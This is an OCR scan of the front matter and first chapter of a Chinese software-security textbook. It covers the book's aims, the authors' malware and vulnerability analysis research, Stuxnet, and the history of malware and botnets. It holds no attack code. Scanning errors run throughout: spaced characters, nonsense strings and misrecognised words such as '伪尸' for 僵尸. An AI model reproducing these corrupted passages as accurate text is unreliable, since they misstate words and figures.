分 析 与 应 用 


HEE 应 凌云 杨 轶 ”编著 





清华 大 学 出 版 社 


等 学 校 网 络 空间 安全 专业 规划 教材 


E 


软件 安全 分 析 与 应 用 


HKE 应 凌云 杨 Bk 编著 


清华 大 学 出 版 社 
db m 


内 容 简 介 


本 书 作者 根据 其 多 年 的 软件 安全 研究 成 果 , 对 软件 安全 分 析 方 法 进行 了 梳理 和 总 结 。 全 书 由 易 到 
难 、 由 浅 入 深 地 全 面 介绍 了 二 进 制程 序 分 析 所 需 的 基础 知识 和 基础 分 析 工 具 ,程序 切片 、 符 号 执行 .模糊 
测试 .污点 分 析 等 软件 分 析 基 础 方法 ,以 及 相关 分 析 方法 在 恶意 代码 分 析 、 软 件 漏洞 挖掘 分 析 、 网 络 协议 
逆向 分 析 ,移动 智能 终端 应 用 软件 安全 分 析 等 方面 的 应 用 。 本 书 不 仅 介 绍 了 相关 方法 和 原理 ,还 分 析 了 
当前 国际 上 相关 的 主流 工具 和 系统 ,可 供 读 者 学 习 和 参考 ;同时 ,在 安全 分 析 应 用 方面 ,也 结合 了 大 量 的 
真实 案例 ,有 助 于 读者 进一步 深刻 理解 相关 方法 与 技术 的 原理 和 价值 。 

本 书 不 仅 可 作为 网 络 空间 安全 专业 本 科 生 、 研 究 生 相关 课程 的 教材 ,也 可 供 对 软件 安全 感 兴趣 的 广 
大 学 者 以 及 从 事 软 件 漏洞 和 恶意 代码 分 析 工 作 的 专业 人 员 人 参考 。 
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网 络 空间 安全 已 是 世界 各 国 关 注 的 重要 战略 问题 ,各 国政 府 、. 学术 界 、 
产业 界 都 投入 了 大 量 的 资源 来 改善 网 络 空间 安全 状况 ,发 展 网 络 空间 安全 
防护 手段 。 为 适应 网 络 技术 和 应 用 的 快速 发 展 , 各 种 新 的 安全 技术 、 安 全 产 
品 、 安 全 方案 层出不穷 。 当 前 网 络 系统 中 ,从 不 同 层次 .不 同 角 度 实现 的 安 
全 产品 已 广泛 应 用 ,但 从 近年 来 曝光 的 各 类 安全 事件 来 看 ,各 种 攻击 手段 仍 
然 防不胜防 。 究 其 原因 ,软件 漏洞 及 其 利用 是 攻击 成 功 的 关键 ,也 是 系统 防 
御 的 难点 。 

“FZR, UERR ERZE, URRAK” ARRA Zk 
的 安全 模型 和 设计 方案 ,但 在 这 些 方案 的 实现 中 ,开发 人 员 的 疏忽 或 个 别 技 
术 的 缺陷 都 可 能 引入 软件 漏洞 ,让 整个 方案 失效 ,甚至 直接 威胁 整个 系统 的 
安全 。2010 年 , 震 网 蠕虫 利用 7 个 软件 漏洞 成 功 突破 了 伊朗 核电 站 的 物理 
隔离 网 络 ,造成 严重 破坏 ;2011 年 ,攻击 者 利用 漏洞 成 功 渗透 进入 了 著名 的 
安全 公司 RSA 公司 的 内 部 网 络 ,并 窃取 了 大 量 敏感 信息 ;2015 年 ,以 擅长 攻 
击 著称 的 黑客 团队 Hacking Team 的 内 部 网 络 遭 受 攻 击 , 大 量 的 漏洞 利用 代 
码 、 内 部 研讨 资料 等 敏感 数据 泄露 。 这 些 案 例 都 给 我 们 敲 响 了 警钟 ,无 论 多 
么 安全 的 防护 方案 都 有 可 能 因为 “小 小 的 ”软件 缺陷 而 被 彻底 突破 。 

近年 来 ,各 类 安全 事件 的 曝光 让 人 们 越 来 越 关注 软件 的 安全 性 问题 。 
各 类 软件 漏洞 挖掘 的 高 手 也 成 为 业界 的 宠儿 ,但 随 着 软件 复杂 性 的 增加 以 
及 漏洞 和 漏洞 利用 模式 的 变化 ,仅仅 依赖 于 少量 有 个 人 天 赋 的 高 手 已 经 远 
远 不 能 满足 现实 的 需求 。 利 用 先进 的 技术 方法 来 解决 软件 安全 问题 ,一 直 
是 学 术 界 、 产 业界 共同 关注 的 焦点 问题 ,也 是 当前 的 一 大 难点 问题 。 

2016 年 ,美国 国防 部 组 织 的 DARPA CGC 比赛 (Cyber Grand 
Challenge) 更 是 将 软件 漏洞 的 自动 化 发 据 、 分 析 、 利 用 、 防 御 技 术 研 究 推 向 高 
潮 ,DARPA 组 织 该 比赛 的 初衷 之 一 也 是 为 了 吸引 更 多 的 社会 资源 关注 、 参 
与 该 问题 的 技术 研究 工作 。 这 次 比赛 吸引 了 众多 高 校 科 研 机 构 和 企业 团 
队 的 关注 。 最 终 , 来 自 卡 耐 基 。 梅 隆 大 学 的 ForAllSecure 团队 获得 第 一 。 
虽然 CGC 比赛 中 的 场景 设 定 与 实际 情况 有 很 大 差距 ,但 这 次 比赛 验证 了 自 
动 化 攻防 的 技术 可 能 性 ,代表 了 未 来 的 技术 发 展 方向 。 随 着 未 来 软件 技术 
的 发 展 和 广泛 应 用 ,软件 安全 问题 将 越 来 越 突出 ,因此 ,发 展 新 的 软件 安全 
技术 是 未 来 的 主要 发 展 方向 。 

我 国 是 软件 产业 大 国 ,也 是 软件 应 用 大 国 。 在 软件 安全 方面 面临 的 问 
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题 尤 为 突出 。 究 其 原因 ,一 方面 是 由 于 我 国 大 量 的 软件 产品 ,尤其 是 操作 系统 、 数 据 库 等 
基础 软件 产品 依赖 于 国外 厂商 ,我 们 不 得 不 面 对 软 件 厂商 不 可 信 的 现实 问题 ;但 更 重要 的 
是 我 们 目前 在 软件 产品 安全 方面 的 审查 能 力 仍 很 薄弱 ,缺乏 有 效 的 技术 手段 对 软件 产品 
的 安全 问题 实施 监管 。 针 对 软件 安全 问题 ,我 国 相 关 部 门 和 机 构 做 了 大 量 的 部 署 ,取得 了 
一 系列 的 成 果 和 突破 。 在 软件 安全 检测 、 软 件 漏洞 分 析 等 方面 形成 了 一 系列 成 果 , 大 量 成 
果 也 已 经 成 功 转 化 ,为 提升 我 国 网 络 空间 安全 保障 能 力 发 挥 了 重要 作用 。 

但 软件 安全 问题 是 典型 的 对 抗 性 问题 , 面 对 我 国 软件 产业 的 快速 发 展 ,当前 软件 安全 
技术 和 成 果 仍 远 无 法 满足 现实 的 需求 。 高 技术 对 抗 需要 高 技术 手段 支撑 ,从 2016 年 的 
DARPA CGC 比赛 可 以 看 出 ,污点 传播 分 析 、 符 号 执行 等 以 前 主要 在 学 术 研 究 工作 中 采 
用 的 方法 和 技术 已 逐步 可 支撑 一 系列 软件 安全 分 析 实 践 工作 ,如 何 进 一 步 推进 相关 方法 
和 技术 的 实用 化 是 当前 学 术 界 和 工业 界 共同 关注 的 焦点 问题 。 

本 书 作者 苏 正 害 研究 员 及 其 团队 十 多 年 来 一 直 从 事 软 件 安全 研究 工作 , 曾 主 持 了 国 
家 863 计划 、 国 家 自然 科学 基金 .国家 科技 支撑 计划 等 一 系列 国家 重点 任务 的 攻关 工作 ， 
在 软件 安全 方面 取得 了 一 系列 技术 突破 ,在 动态 污点 传播 分 析 、 恶 意 软件 分 析 与 检测 、 软 
件 漏洞 分 析 与 利用 等 方面 有 重大 创新 与 积累 ,主持 研制 了 恶意 软件 分 析 检 测 系 统 、 软 件 漏 
洞 分 析 系 统 等 多 项 成 果 , 在 软件 安全 方面 具有 丰富 的 研究 和 实践 经 验 。 

本 书 由 他 和 他 的 团队 根据 多 年 的 研究 积累 和 实践 凝练 而 成 ,从 基本 概念 .方法 原理 、 
重要 工具 系统 和 关键 应 用 场景 等 不 同 层面 对 目前 国内 外 的 软件 安全 分 析 相 关 技 术 和 方法 
进行 了 系统 的 总 结 和 梳理 。 本 书 兼顾 了 学 术 研 究 前 沿 技术 方法 和 相关 技术 方法 在 工程 实 
践 中 的 应 用 , 既 剖 析 了 软件 安全 分 析 中 常用 的 动态 污点 分 析 \ 符 号 执行 等 基础 方法 ,也 结 
合 真 实 应 用 场景 和 实际 案例 , 阅 述 了 相关 技术 方法 在 软件 漏洞 分 析 与 利用 、 恶 意 软 件 分 
析 、 协 议 逆 向 分 析 等 多 个 具体 问题 中 的 应 用 。 

本 书 是 软件 安全 分 析 方 面 一 本 难得 的 理论 与 实践 紧密 结合 的 书籍 ,我 愿意 把 它 推 荐 
给 从 事 软 件 安 全 研究 与 实践 的 科研 人 员 、 研 究 生 和 技术 人 员 。 
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软件 的 应 用 已 经 渗透 到 社会 的 方方面面 ,承载 着 重要 的 社会 价值 。 软 
件 开 发 过 程 无 法 做 到 完美 ,软件 问题 与 漏洞 难以 避免 ,软件 也 成 为 攻击 者 的 
重要 目标 。 当 前 曝光 的 各 类 网 络 安全 事件 中 , 绝 大 部 分 都 与 软件 安全 问题 
相关 ,软件 安全 问题 已 成 为 关乎 个 人 利益 、 社 会 稳定 、 国 家 安全 的 重要 问题 。 

软件 安全 问题 中 的 软件 漏洞 和 恶意 软件 是 两 大 经 典 问 题 , 前 者 是 由 于 
软件 设计 开发 过 程 中 的 缺陷 带 来 的 安全 隐患 ,后 者 则 是 攻击 者 有 意 设 计 的 
具有 破坏 性 的 软件 工具 。 软 件 自 身 越 来 越 复杂 ,规模 越 来 越 庞大 ,软件 漏洞 
模式 、 利 用 方式 也 越 来 越 多 样 化 ,这 就 对 软件 漏洞 的 发 现 、 分 析 与 评估 等 工 
作 带 来 了 一 系列 的 挑战 ;而 恶意 软件 自身 的 技术 也 在 不 断 发 展 ,出 现 了 各 种 
自我 保护 技术 、 隐 蔽 通信 手段 等 ,这 也 对 恶意 软件 的 分 析 和 处 置 提出 了 新 的 
要 求 。 无 论 是 软件 漏洞 分 析 还 是 恶意 软件 分 析 , 软 件 自身 的 复杂 性 已 经 超 
越 一 般 技术 人 员 的 分 析 能 力 和 理解 能 力 ,复杂 软件 的 深度 分 析 能 力 是 软件 
漏洞 分 析 和 恶意 软件 分 析 共 同 面临 的 瓶颈 问题 。 

如 何 提高 对 复杂 软件 的 深度 分 析 能 力 , 并 针对 具体 的 应 用 场景 ,设计 相 
关 的 分 析 、 检 测 方 法 ,一 直 是 软件 分 析 领 域 乃至 信息 安全 领域 关注 的 焦点 问 
题 。 特 别 是 考虑 到 很 多 软件 系统 无 法 获得 源 代码 的 现实 ,如 何 实现 不 依赖 
于 源 代码 的 软件 深度 分 析 是 近年 来 的 研究 热点 。 

面向 软件 安全 问题 ,本 书 总 结 了 一 系列 软件 分 析 基 础 性 方法 ,并 重点 介 
绍 了 软件 安全 分 析 工 作 中 的 典型 场景 和 相关 技术 手段 。 考 虑 到 技术 内 容 的 
完整 性 , 书 中 也 对 当前 常见 的 成 熟 工 具 ( 如 反 汇 编 工具 、 调 试 工具 等 ) 和 相关 
基础 知识 (如 Intel 指令 集 、 操 作 系 统 内 核 等 ) 进 行 了 简单 介绍 。 

本 书 的 写作 主要 由 中 国 科学 院 软 件 研究 所 可 信 计 算 与 信息 保障 实验 室 
CTCA 实验 室 ) 的 信息 对 抗 与 网 络 保障 团队 共同 完成 ,本 书 的 撰写 也 是 该 团 
队 对 相关 技术 方法 和 研究 进展 的 总 结 。 该 团队 于 2004 年 由 冯 登 国 研究 员 创 
建 ,后 来 由 我 组 织 。2004 年 底 , 团 队 开 始 关注 基于 硬件 虚拟 化 的 恶意 软件 分 
析 ;2005 年 底 , 组 织 开 发 了 第 一 个 基于 开源 系统 QEMU 的 恶意 软件 分 析 系 
统 , 当 时 命名 为 WooKon( 取 音 “ 悟 空 ");2010 年 ,面向 恶意 软件 检测 需求 ,在 
WooKon 系统 的 基础 上 推出 了 基于 硬件 虚拟 化 的 APT(Advanced 
Persistent Threat) 攻 击 检测 引擎 ,并 在 多 个 部 门 和 机 构成 功 应 用 ,2017 年 我 
们 根据 新 的 需求 与 新 的 形势 又 推出 了 金刚 恶意 软件 智能 分 析 系 统 ;从 2006 年 
起 ,开始 关注 将 动态 污点 分 析 应 用 于 恶意 软件 分 析 和 瀣 洞 分 析 的 相关 研究 ， 
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经 过 多 年 研发 和 逐步 完善 ,2010 年 研制 了 第 一 套 基 于 硬件 虚拟 化 的 动态 污点 分 析 系 
统一 一 AOTA 系统 (Application-Oriented Analysis System) ,并 成 功 应 用 于 漏洞 利用 自 
动 生成 研究 ;2013 年 构建 了 一 个 多 样 性 漏洞 利用 自动 生成 系统 一 一 PolyAEG 系统 。 

我 们 的 工作 也 得 到 了 一 系列 国家 科技 项 目的 支持 。 团 队 在 最 初 建立 的 很 长 时 间 内 没 
有 得 到 相关 项 目的 支持 ,在 此 要 感谢 时 任 信息 安全 国家 重点 实验 室 主任 冯 登 国 研究 员 的 
大 力 支持 ,保证 了 团队 研究 工作 的 持续 发 展 。2006 年 团队 的 工作 获得 了 第 一 个 国家 863 
计划 项 目 “ 恶 意 代码 机 理 分 析 与 特征 提取 技术 研究 ”, 此 后 得 到 了 国家 自然 科学 基金 、 国 家 
科技 支撑 计划 、 国 家 信息 安全 产业 化 专项 等 一 系列 项 目的 支持 ,也 在 相关 项 目的 支持 下 完 
成 了 从 基础 方法 、 关 键 技术 、 原 型 系统 到 成 果 转 化 的 科研 过 程 。 

软件 分 析 理 论 博大 精深 ,软件 安全 问题 错综复杂 , 因 作 者 能 力 和 精力 所 限 , 难 于 对 相 
关 技 术 和 方法 进行 全 面 、 系 统 的 总 结 。 因 此 ,本 书 主要 对 使 用 较 多 的 程序 切片 、 污 点 分 析 、 
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第 1X 


L 1 早 


软件 应 用 越 来 越 广泛 ,软件 安全 问题 也 越 来 越 突出 ,恶意 软件 、 软 件 漏洞 软件 后 门 等 
安全 问题 层出不穷 。 如 何 对 软件 产品 进行 安全 性 分 析 , 发 现 相关 问题 ,剖析 安全 问题 机 
理 , 进 而 研发 设计 相应 的 防御 手段 ,是 软件 安全 性 分 析 的 主要 目标 。 本 章 主要 介绍 软件 安 
全 问题 的 背景 、 典 型 问题 软件 安全 性 分 析 的 主要 技术 方法 以 及 本 书 的 组 织 结构 。 


1.1 3 引 


Tij 


软件 被 称 为 信息 系统 的 “灵魂 ”。 随 着 信息 技术 的 广泛 应 用 ,这 一 “灵魂 ”也 渗透 到 了 
社会 的 各 个 角落 ,软件 承载 了 越 来 越 大 的 社会 价值 ,涉及 国民 经 济 、 社 会 稳定 和 国家 安全 。 
但 当 这 一 “灵魂 "由 世间 凡人 缔造 时 , 则 不 可 避免 地 引入 了 各 种 问题 。 

一 方面 ,由 于 技术 和 应 用 的 快速 发 展 ,软件 自身 越 来 越 复 杂 , 规 模 也 越 来 越 庞大 。 现 
在 一 般 的 软件 产品 开发 ,代码 动 辑 千 万 行 , 单 次 执行 的 指令 序列 规模 以 T(2”" 量 级 ) 计 ; 涉 
及 的 技术 也 越 来 越 多 样 ,可 能 涉及 密码 ,协议 、 图 像 等 。 软 件 自身 复杂 性 的 增加 造成 软件 
开发 人 员 在 具体 开发 过 程 中 不 可 避免 地 会 出 现 一 些 错误 而 引入 各 种 程序 漏洞 。 如 图 1-1 
所 示 ,根据 国际 权威 漏洞 发 布 组 织 CV E 统计 ,1999 年 发 现 软件 漏洞 数量 不 到 1600 个 ,而 
2014 年 新 发 现 的 软件 漏洞 数量 已 接近 10 000 个 。 软 件 产业 的 高 度 市 场 竞 争 造成 软件 产 
品 开 发 周期 越 来 越 短 ,也 在 一 定 程度 上 使 得 这 一 问题 更 为 严峻 。 
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图 1-1 CVE 漏洞 发 布 统计 































































































另 一 方面 ,凡人 都 是 有 私欲 的 , 当 软 件 产品 承载 了 越 来 越 多 的 利益 时 ,一 些 组 织 也 在 
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利用 软件 的 安全 问题 来 获取 利益 。 据 报道 ,2015 年 2 月 黑客 团体 入 侵 了 约 30 个 国家 的 
银行 , 盗 取 了 近 10 亿美 元 。 同 时 ,各 种 黑色 产业 链 已 经 形成 规模 , 朝 规模 化 、 集 团 化 方向 
发 展 ,窃取 个 人 隐私 信息 搜集 各 类 账号 、 盗 取 虚 拟 资产 、 恶 意 敲 诈 勒 索 等 案例 屡见不鲜 ; 
同时 ,一 些 政府 组 织 也 将 软件 产品 作为 情报 获取 的 手段 ,2013 年 底 ,根据 斯 诺 登 曝光 的 机 
密 文件 显示 ,国际 著名 的 网 络 安全 公司 RSA 公司 接受 美国 国家 安全 局 提供 的 资金 ,在 相 
关 的 软件 产品 BSafe 中 通过 降低 密码 算法 强度 ,为 美国 国家 安全 部 门 留 下 后 门 ,使 其 便于 
获取 情报 。 

从 以 上 分 析 可 以 发 现 ,无 论 是 软件 复杂 性 增加 对 人 类 认 知 带 来 的 挑战 ,还 是 某 些 个 人 
和 团体 组 织 受 利益 的 驱使 对 软件 问题 的 利用 ,都 是 无 法 有 效 解决 的 问题 。 可 以 预见 , 随 着 
技术 的 发 展 和 应 用 的 深入 ,软件 安全 问题 将 越 来 越 严峻 。 

软件 安全 问题 虽 是 人 为 造成 的 ,但 也 是 其 技术 发 展 的 必然 。 软 件 与 硬件 相 比 ,具有 研 
发 技术 门槛 低 、 研 发 周期 短 .可 扩展 性 强 等 特点 ,因此 ,当前 硬件 平台 越 来 越 向 基础 性 、 通 
用 性 方向 发 展 , 复 杂 性 高 .扩展 性 要 求 高 的 功能 则 越 来 越 多 地 依赖 于 软件 系统 实现 。 

普通 用 户 体 会 最 深 的 就 是 手机 终端 的 发 展 。 现 代 意 义 的 移动 通信 技术 最 早出 现 于 
20 世纪 20 年 代 , 但 真正 的 手机 出 现 于 20 世纪 70 年 代 中 期 。 早 期 的 移动 终端 主要 是 依 
赖 于 硬件 实现 ,比如 世界 上 第 一 台 手 机 摩托 罗拉 DynaTAC 8000X。 而 随 着 手机 操作 系 
统 的 出 现 ,手机 的 软 硬 件 分 离 越 来 越 明显 .智能 手机 带 来 了 移动 互联 网 的 繁荣 。 智 能 移动 
终端 操作 系统 最 早 主要 应 用 于 PDA ,20 世纪 90 年 代 , 英 国 Psion 公司 推出 Psion Series 3 
型 PDA ,搭载 了 EPOC 操作 系统 ,该 系统 后 续 发 展 为 Symbian 系统 。1996 年 ,Palm 公司 
发 布 Pilot 1000 掌上 电脑 ,使 用 Palm OS 操作 系统 。 而 随 着 手机 和 PDA 功能 的 融合 , 诺 
基 亚 ,微软 、 黑 葡 等 公司 相继 推出 了 针对 智能 手机 的 移动 操作 系统 ,争夺 智能 手机 市 场 份 
额 。2007 年 iPhone 上 市 ,iOS 与 Android 操作 系统 的 推出 则 将 智能 手机 操作 系统 带 入 了 
一 个 新 的 时 代 。 在 移动 终端 硬件 快速 发 展 、 移 动 网 络 带宽 不 断 增 加 的 同时 ,智能 手机 操作 
系统 的 出 现 不 仅 丰 富 了 手机 的 功能 ,使 各 类 应 用 层出不穷 ,也 有 效 提高 了 系统 的 可 扩展 
性 ,可 以 随时 升级 ,安装 新 的 功能 应 用 。 对 于 开发 者 而 言 ,智能 移动 终端 操作 系统 的 出 现 
也 大 大 降低 了 智能 移动 终端 应 用 软件 的 开发 技术 门槛 。 这 里 所 说 的 应 用 软件 也 包括 针对 
智能 手机 的 恶意 软件 ,这 也 是 智能 手机 恶意 软件 快速 泛滥 的 原因 之 一 。2004 年 ,卡巴 斯 
基 公 司 发 现 第 一 个 针对 智能 手机 的 病毒 Cabir,10 年 之 后 , 据 卡 巴 斯 基 公司 统计 ,其 发 现 
的 针对 智能 手机 的 样本 已 达 34 万 之 多 中。 而 据 2015 年 初 腾 讯 公司 统计 数据 表明 ， 
2014 年 有 接近 2 亿 部 手机 感染 病毒 ,日 平均 感染 54 万 部 。 

工业 控制 系统 是 另外 一 个 正在 发 展 过 程 中 的 信息 系统 。 传 统 的 工业 控制 系统 主要 依 
赖 于 专用 的 硬件 设备 实现 ,而 由 于 工业 控制 系统 越 来 越 复杂 以 及 通用 计算 平台 的 发 展 , 当 
前 工业 控制 系统 也 越 来 越 多 地 借助 通用 的 计算 平台 和 软件 实现 ,比如 通用 的 计算 机 、 常 见 
的 Windows 操作 系统 、 以 太 网 网 络 设 备 越 来 越 多 地 进入 工业 控制 系统 。 这 一 趋势 是 工业 
自动 控制 技术 自身 发 展 的 需要 , 带 来 了 工业 控制 系统 的 快速 繁荣 ,但 同时 也 带 来 了 新 的 安 
全 问题 。 针 对 Windows 系统 的 传统 攻击 手段 适当 迁移 就 可 以 实施 对 工业 控制 系统 的 破 
坏 。2009 年 6 月 检测 到 的 震 网 (Stuxnet) 蠕 虫 展示 了 传统 的 网 络 攻击 对 工业 控制 系统 的 
破坏 能 力 。 在 震 网 蠕虫 的 整个 传播 ` 破 坏 过程 中 , 共 利 用 了 4 个 零 日 漏洞 ,攻击 过 程 涉及 
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Windows 系统 .西门子 公司 的 SIMATIC WinCC 与 PCS 7 等 系统 。 它 首先 通过 漏洞 感染 
Windows 系统 ,然后 寻找 西门 子 的 SIMATIC WinCC 与 PCS7 系统 ,并 通过 西门 子 公 司 
总 线 协议 Profibus 注入 木马 ,入 侵 可 编程 控制 器 (Programmable Logic Controller, PLC) , 
最 后 寻找 使 用 变频 器 控制 电机 转速 并 在 特定 频率 范围 (800 一 1200Hz) 的 自动 化 设备 ,对 
其 进行 破坏 。 震 网 蠕虫 被 认为 是 第 一 款 应 用 于 实战 的 网 络 战 武器 , 震 网 时 虫 的 攻击 成 功 
改变 了 人 们 的 很 多 传统 认识 。 传 统 上 我 们 认为 ,工业 控制 系统 是 相对 封闭 的 ,被 攻击 风险 
低 , 但 实际 上 控制 系统 仍 依赖 于 操作 人 员 ,操作 人 员 的 安全 意识 差 ,U 盘 交 叉 使 用 、 随 意 
接 和 人 其 他 网 络 都 可 能 直接 破坏 网 络 的 隔离 策略 ;传统 上 认为 工业 控制 系统 中 的 可 编程 控 
制 器 (PLC) 、 远 程 终端 单元 (RTU) 等 不 是 运行 在 现代 操作 系统 上 的 ,不 存在 相应 的 漏洞 
利用 可 能 ,不 易 受到 攻击 ,而 实际 上 PLC 可 以 并 且 已 经 成 为 恶意 软件 感染 的 目标 中 。 

芯片 技术 的 发 展 也 在 改变 人 们 对 软 硬 件 界 定 的 传统 认识 。 在 传统 观念 看 来 ,芯片 是 
一 个 完全 独立 的 硬件 产品 ,但 近年 来 ,为 了 快速 .灵活 地 扩展 功能 ,芯片 已 支持 微 码 方式 对 
芯片 进行 更 新 或 打 补 丁 , 即 蕊 片 的 大 量 功 能 也 靠 软件 方式 一 一 微 码 实现 。 同 样 , 微 码 模式 
在 提供 芯片 快速 更 新 的 灵活 性 时 ,也 为 破坏 者 开 了 一 条 小 口子 。 虽 然 现 在 还 没有 直接 攻 
击 的 案例 出 现 , 但 这 一 风险 是 客观 存在 的 。 

因此 ,可 以 预见 , 随 着 技术 的 发 展 , 软 件 的 应 用 将 越 来 越 广泛 ,软件 的 功能 也 将 越 来 越 
复杂 ,而 市 场 竞 争 等 因素 造成 软件 的 开发 周期 越 来 越 短 ,问题 也 将 越 来 越 多 ,因此 如 何 分 
析 软 件 产 品 ,发 现 安全 问题 ,也 是 当前 的 技术 热点 ,学 术 界 、 产 业界 .管理 部 门 等 社会 各 界 
也 越 来 越 关 注 这 一 问题 。 





1.2 典型 安全 问题 


软件 的 安全 问题 应 该 说 是 从 软件 诞生 之 日 起 就 存在 的 ,但 带 来 直接 影响 并 受到 广泛 
关注 则 是 从 软件 承载 了 各 种 利益 和 价值 开始 的 ,特别 是 软件 作为 大 众 性 商品 被 广泛 应 用 
时 ,其 安全 问题 才 得 到 足够 的 重视 。 一 方面 , 随 着 研究 、 分 析 的 深入 ,我 们 注意 到 软件 安全 
的 问题 非常 多 样 化 , 另 一 方面 ,试图 利用 软件 安全 问题 获 利 的 各 类 组 织 机 构 也 在 不 断 发 展 
针对 软件 安全 问题 的 利用 、 破 坏 技术 手段 ,造成 软件 安全 问题 日 趋 复杂 。 当 前 的 软件 安全 
问题 可 粗略 地 分 为 3 类 , 即 恶 意 软件 .软件 漏洞 和 软件 后 门 。 


121 恶意 软件 


恶意 软件 的 字面 意思 容易 理解 , 即 包含 恶意 功能 的 软件 。 但 由 于 是 否 “ 恶 意 ” 也 具有 
很 强 的 主观 性 ,因此 ,目前 仍 很 难 对 恶意 软件 进行 一 个 非常 客观 的 标准 定义 。 

传统 的 恶意 软件 主要 是 指 病毒 木马 .蠕虫 .僵尸 网 络 、 间 谍 软 件 等 ,其 共同 的 特点 是 
在 用 户 不 知情 的 情况 下 实施 一 系列 的 破坏 功能 ,或 穷 取信 息 ,或 远程 控制 ,或 实施 破坏 等 。 
因此 ,传统 的 恶意 软件 一 直 在 发 展 3 方面 的 能 力 : 渗透 与 扩散 能 力 , 即 如 何 突破 相关 的 防 
御 机 制 ,感染 既定 的 目标 系统 ;隐蔽 能 力 , 即 如 何 有 效 隐蔽 自身 的 各 种 特征 ,避免 被 用 户 察 
觉 或 被 相关 的 安全 检测 工具 发 现 ,也 包括 在 被 发 现 的 情况 下 ,如 何 防止 自身 被 进一步 的 分 
Tr ,保护 恶意 软件 的 操控 者 身份 ;破坏 能 力 , 即 具体 如 何 搜集 信息 或 实施 破坏 等 。 
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恶意 软件 虽然 需要 执行 特定 的 攻击 代码 ,但 其 对 于 普通 用 户 而 言 ,并 不 一 定 直观 地 以 
软件 产品 的 形式 存在 ,比如 很 多 Office 文件 .PDF 文件 .图 像 文件 等 均 可 能 含有 恶意 代 
码 ,只 不 过 相关 恶意 代码 的 执行 必须 依赖 于 特定 的 软件 漏洞 来 实施 攻击 。 

恶意 软件 的 发 展 也 是 随 着 信息 技术 的 发 展 和 应 用 而 发 展 的 。 根 据 恶 意 软件 的 发 展 历 
程 , 可 将 其 分 为 这 样 3 个 阶段 。 第 一 阶段 ,单机 传播 阶段 。 在 20 世纪 80 年 代 , 当 时 的 计 
算 机 应 用 仍 以 单机 为 主 , 计 算 机 之 间 的 数据 交换 仍 大 量 地 借助 于 磁盘 ,因此 ,当时 的 恶意 
软件 以 磁盘 病毒 ,文件 宏 病毒 为 主 , 比 如 Brain、 黑 色 星 期 五 .Wazzu 等 。 第 二 阶段 ,网 络 传 
播 阶段 。 随 着 网 络 技术 的 发 展 和 应 用 ,计算 机 之 间 实 现 了 直接 互 连 ,邮件 等 应 用 也 越 来 越 
普遍 ,因此 随 之 而 来 的 是 邮件 病毒 .蠕虫 .比如 Melissa, Loveletter, Nimda, Code Red 等 。 
这 一 变化 , 带 来 的 结果 就 是 件 的 传播 能 力 大 大 增强 ,以 2003 年 爆发 的 SQL Server 
蠕虫 为 例 , 它 在 10 分 钟 之 内 就 传 遍 了 全 球 ,被 认为 是 当时 传播 最 快 的 软件 之 一 ,这 一 
传播 速度 是 原来 的 磁盘 病毒 等 传播 方式 所 不 可 比拟 的 。 第 三 阶段 ,协同 攻击 阶段 。 传 统 
的 病毒 .木马 实施 破坏 仍 以 单一 的 节点 单独 实施 ,而 僵尸 网 络 的 出 现 , 则 实现 了 被 感染 节 
点 之 间 的 协同 ,可 以 实施 分 布 式 拒绝 服务 攻击 (DDoS) 、 多 链 跳 转 攻击 等 大 规模 的 协同 攻 
击 。 特 别 是 结构 化 P2P 僵尸 网 络 的 出 现 ,进一步 提升 了 僵尸 网 络 的 高 效 控制 能 力 ,可 以 
高 效 地 管理 大 规模 的 节点 ,并 具有 良好 的 可 靠 性 和 安全 性 。2010 年 发 现 的 西班牙 蝴蝶 
(Mariposa) 伪 尸 网 络 控制 的 主机 数量 曾经 达到 1200 万 ,2012 年 发 现 的 BredoLab 僵尸 网 
络 节 点 数量 甚至 达到 了 3000 万 。 伪 尸 网 络 的 生存 期 也 很 长 ,2014 年 CNCERT/CC 监测 
显示 ,2008 年 已 出 现 的 飞 客 蠕虫 构建 的 僵尸 网 络 , 国 内 月 均 感染 量 在 100 万 台 以 上 。 部 
分 僵尸 网 络 还 通过 域名 快速 变换 和 P2P 网 络 等 通信 手段 实现 节点 集结 ,弥补 了 传统 僵尸 
网 络 对 控制 中 心 单 点 依赖 的 缺陷 ,具有 和 较 高 的 抗 摧毁 性 ,传统 的 防御 措施 难以 有 效 缓解 僵 
尸 网 络 的 威胁 ,例如 Kelihos、Sality、ZeroAccess、ZeusGameover 等 僵尸 网 络 在 安全 执法 
部 门 的 屡次 打击 下 仍然 得 以 持续 存活 。 图 1-2 是 2014 年 4 月 监测 到 的 Sality 节点 里 面 
WAAR IP 的 节点 ,有 3000 个 左右 ,黑色 表示 测量 时 存活 的 节点 ,灰色 表示 失 活 的 节点 。 




















1-2 2014 年 4 月 监测 到 的 Sality 僵尸 网 络 的 全 球状 态 
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恶意 软件 的 发 展 历程 可 以 看 出 ,恶意 软件 的 发 展 与 软件 技术 乃至 信息 技术 的 发 展 

都 息息相关 。 随 着 智能 手机 的 出 现 、 工 业 控 制 系统 的 通用 化 转变 ,也 出 现 了 针对 各 类 不 同 
平台 的 恶意 软件 。 例 如 ,2015 4E 9 月 发 现 的 针对 智能 手机 的 恶意 软件 Brain Test 伪装 成 
游戏 软件 ,利用 系统 漏洞 获取 root 权限 ,并 安装 rootkit 下 载 执行 远程 代码 。 据 统计 ,该 
恶意 软件 已 感染 了 上 百 万 部 设备 ,而 2009 年 针对 伊朗 核电 站 的 震 网 蠕虫 更 是 成 为 网 络 战 
的 经 典 作品 。 

恶意 软件 早期 主要 是 一 些 技术 爱好 者 搞 恶 作 剧 或 炫 炊 自 己 的 技术 能 力 。 但 随 着 软件 
承载 越 来 越 多 的 经 济 价值 和 国家 利益 时 ,特别 是 黑色 产业 链 的 发 展 , 造 成 当前 的 恶意 软件 
已 被 广泛 作为 一 种 件 利 工具 。 一 方面 ,各 类 黑客 组 织 或 一 部 分 民间 的 技术 爱好 者 通过 开 
发 恶意 软件 ,窃取 网 络 虚拟 资产 .个 人 隐私 信息 等 方式 件 利 ; 另 一 方面 ,一 些 国家 、 组 织 机 
构 也 在 发 展 这 方面 的 能 力 以 实施 破坏 或 获取 情报 。 美 国 于 2010 年 正式 成 立 了 网 络 战 部 
队 , 必 网 络 空 间 联合 作战 条 令 》 于 2014 年 10 月 21 日 发 布 ,从 顶层 设计 上 统一 了 美军 网 络 
空间 联合 作战 概念 ,机 构 职 责 、 联 合 程序 和 方法 ,从 作战 要 素 上 分 析 了 网 络 空 间作 战 威胁 
